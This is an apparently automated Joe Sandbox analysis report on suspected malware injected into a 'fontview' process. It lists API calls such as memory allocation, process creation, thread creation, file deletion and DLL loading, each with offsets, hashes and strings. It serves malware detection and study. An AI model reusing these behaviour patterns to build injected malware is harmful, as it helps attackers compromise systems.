                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2738559852-0
                                                                                                                              • Opcode ID: b7abfef7784aa854fe949d1fdcbe2a4ebe1a6b5c624e9fc181da155e2a6ffa35
                                                                                                                              • Instruction ID: 284b26fb0fb3708ee82b0c707aa09a0396aa68b4567a2194bc5e08d734fe9905
                                                                                                                              • Opcode Fuzzy Hash: b7abfef7784aa854fe949d1fdcbe2a4ebe1a6b5c624e9fc181da155e2a6ffa35
                                                                                                                              • Instruction Fuzzy Hash: 2921C4B2240109BFDB04DF98DC80EEB77ADAF8D714F048208FA5DD7240DA30A9118BB5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(02A41B38,?,02A42249,00000000,00000004,00003000,00000004,00000000,02A42249,?,02A41B38,02A42249,?), ref: 02A55406
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2167126740-0
                                                                                                                              • Opcode ID: f3371544b1aa87ca394e27890c48d4f5b995605479b83cf73aeac1f640bbe760
                                                                                                                              • Instruction ID: 3692610ee0992f9b4facd4329928998842d9a20887fb62f9517f37d40837a8bc
                                                                                                                              • Opcode Fuzzy Hash: f3371544b1aa87ca394e27890c48d4f5b995605479b83cf73aeac1f640bbe760
                                                                                                                              • Instruction Fuzzy Hash: 691116B6200209BFDB10DF98DC81EAB73ADEF89710F108109FE5897240DA70A8118BB2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteFile
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4033686569-0
                                                                                                                              • Opcode ID: 57c27c47a54bcd87636a0a2a60c471030505225754f600c1d6c9e390136ac219
                                                                                                                              • Instruction ID: 431172daf3b88d10a13cd2411b4aab3ee29edb62b7fbe2504334098b57b05a35
                                                                                                                              • Opcode Fuzzy Hash: 57c27c47a54bcd87636a0a2a60c471030505225754f600c1d6c9e390136ac219
                                                                                                                              • Instruction Fuzzy Hash: 0BF0D171641614BFD521E799DC40FABB3ADDFC5720F408409F95C97141DB3079418BB1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A55277
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: a08fca5580a631a550be9335b754077320016150a14adcbc7aded5e184d4430a
                                                                                                                              • Instruction ID: fed54e2177792a2c427a7475194d010e352e20f532f1fedabed3208d1528d5be
                                                                                                                              • Opcode Fuzzy Hash: a08fca5580a631a550be9335b754077320016150a14adcbc7aded5e184d4430a
                                                                                                                              • Instruction Fuzzy Hash: D0E046722402147BD620EA99DC00FABB7ADEBC5B20F408015FA48A7242CA70BA018BF5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 03503cb0cf694b966124a52fd20dd1821e80c5f5c392a714c42c3770c24fc8fb
                                                                                                                              • Instruction ID: 32c57df7b7d6148d7c0d5ea540b1ef8c008f16731a6adb97dc7e8e73bc9b68de
                                                                                                                              • Opcode Fuzzy Hash: 03503cb0cf694b966124a52fd20dd1821e80c5f5c392a714c42c3770c24fc8fb
                                                                                                                              • Instruction Fuzzy Hash: 7D900261601500426180715948044066005ABE13063D6C11DA0555560C861DD9559269
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 48733b00d247362d0eaf720f862e3c234963a765e1f1fc85cbd34d8672d151c7
                                                                                                                              • Instruction ID: 4e7f58594b8e343c357276fe155b5f1c907f917bda0e24f5bd394a204e7eae7b
                                                                                                                              • Opcode Fuzzy Hash: 48733b00d247362d0eaf720f862e3c234963a765e1f1fc85cbd34d8672d151c7
                                                                                                                              • Instruction Fuzzy Hash: B990023160580012B180715948845464005ABE0306B96C019E0425554C8A19DA565361
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 93b9860cd5bca99e1fe062c61e5215b69c842662b1b03398d719d53b179a7deb
                                                                                                                              • Instruction ID: d46aa6fd54381c7cd36ff12c1f1133170ddc36fd198b5bd5b1112afcbbe2477b
                                                                                                                              • Opcode Fuzzy Hash: 93b9860cd5bca99e1fe062c61e5215b69c842662b1b03398d719d53b179a7deb
                                                                                                                              • Instruction Fuzzy Hash: FA90023120140402F1407599540864600059BE0306F96D019A5025555EC66AD9916131
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3735975826.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B69000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004B6D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000C.00000002.3735975826.0000000004BDE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_4a40000_fontview.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 0-2434227226
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(2N-F32-85,00000111,00000000,00000000), ref: 02A40A4D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 1836367815-2434227226
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(2N-F32-85,00000111,00000000,00000000), ref: 02A40A4D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID: 2N-F32-85$2N-F32-85
                                                                                                                              • API String ID: 1836367815-2434227226
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 0-1269752229
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02A5259B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02A5259B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02A5259B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 02A48CF6
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AttributesFile
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 3188754299-2766056989
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 02A4E597
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID: @J7<
                                                                                                                              • API String ID: 2538663250-2016760708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 02A4E597
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize
                                                                                                                              • String ID: @J7<
                                                                                                                              • API String ID: 2538663250-2016760708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A44232
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: 504a5459d5ecf3373cbdd27d0092ae790cb40cf581195c9a81bb27e7d90e6776
                                                                                                                              • Instruction ID: eb26a132fd9d166ab093283ad334ba867ed528a8fafebb03b2cac15bc5673253
                                                                                                                              • Opcode Fuzzy Hash: 504a5459d5ecf3373cbdd27d0092ae790cb40cf581195c9a81bb27e7d90e6776
                                                                                                                              • Instruction Fuzzy Hash: AE011EB9E4020DBBDF10DBE4DD81FAEB7B99B54308F004195AD18A7240FA31EB58CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A47633,00000010,?,?,?,00000044,?,00000010,02A47633,?,?,?), ref: 02A55640
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186235152-0
                                                                                                                              • Opcode ID: 2b99a3d2ba528747ebb5d8efeff1f23e48b528e460fc6ee6051460f241c27a6f
                                                                                                                              • Instruction ID: 7798d4937499c4074d12fc1078eea67f21d739e135f9ffd972c8661350eda5bb
                                                                                                                              • Opcode Fuzzy Hash: 2b99a3d2ba528747ebb5d8efeff1f23e48b528e460fc6ee6051460f241c27a6f
                                                                                                                              • Instruction Fuzzy Hash: 0601C4B2210108BBCB44DE89DC80EEB77ADAF8C750F408208BA0DD3240D630FC518BA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A39995
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: d6c9136912e055820e86070ad2bd0b1d9dcdf308d2b87ea2705310ec5facd245
                                                                                                                              • Instruction ID: 3a6c9d783a9753c5af15d6af48114a31c857e09970367db87ef9847a9408e3f4
                                                                                                                              • Opcode Fuzzy Hash: d6c9136912e055820e86070ad2bd0b1d9dcdf308d2b87ea2705310ec5facd245
                                                                                                                              • Instruction Fuzzy Hash: 18F0657338421437E33162A99C02FD7B28CCB81B71F250015FA0DEB1C0DDA6B54146A5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02A54423
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000C.00000002.3728408141.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_12_2_2a30000_fontview.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Path$NameName_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3514427675-0
                                                                                                                              • Opcode ID: c2445289eda9555fc45807dccd409e16db2224c0dcfe84a935c880136f7ad117
                                                                                                                              • Instruction ID: 4ef2c17557cf1828dd9aa642265a11465ff3bc3a516d0227c2a84c9994b9450c
                                                                                                                              • Opcode Fuzzy Hash: c2445289eda9555fc45807dccd409e16db2224c0dcfe84a935c880136f7ad117
                                                                                                                              • Instruction Fuzzy Hash: F5F034B6640204BFDB10DF58DC40EEB77ADAF89710F108019B908A7201C630A9218BB0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A39995
